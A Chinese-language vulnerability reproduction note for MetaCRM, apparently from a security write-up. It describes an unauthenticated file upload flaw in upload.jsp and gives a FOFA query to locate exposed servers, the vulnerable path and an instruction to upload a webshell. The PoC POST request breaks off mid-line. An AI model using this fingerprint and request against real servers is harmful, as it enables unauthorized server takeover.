0x01 产品简介

MetaCRM是一款智能平台化CRM软件,通过提升企业管理和协同办公,全面提高企业管理水平和运营效率,帮助企业实现卓越管理。美特软件开创性地在CRM领域中引入用户级产品平台MetaCRM V5/V6，多年来一直在持续地为客户创造价值，大幅提升了用户需求满足度与使用的满意度。针对成长型企业，美特软件用先进的CRM产品与技术，开发了适合中小型企业的产品“美客宝”，以及面向云计算的在线CRM系统。

0x02 漏洞概述

美特CRM upload.jsp接口存在文件上传漏洞，未经身份验证的远程攻击者可利用此漏洞上传恶意后门文件，执行任意指令，从而获取服务器权限。

0x03 复现环境

FOFA：body="/common/scripts/basic.js"

0x04 漏洞复现

漏洞路由位置：http://your-ip//develop/systparam/softlogo/file2.jsp

出现文件上传接口则存在漏洞

上传webshell，点提交抓包

PoC

POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle&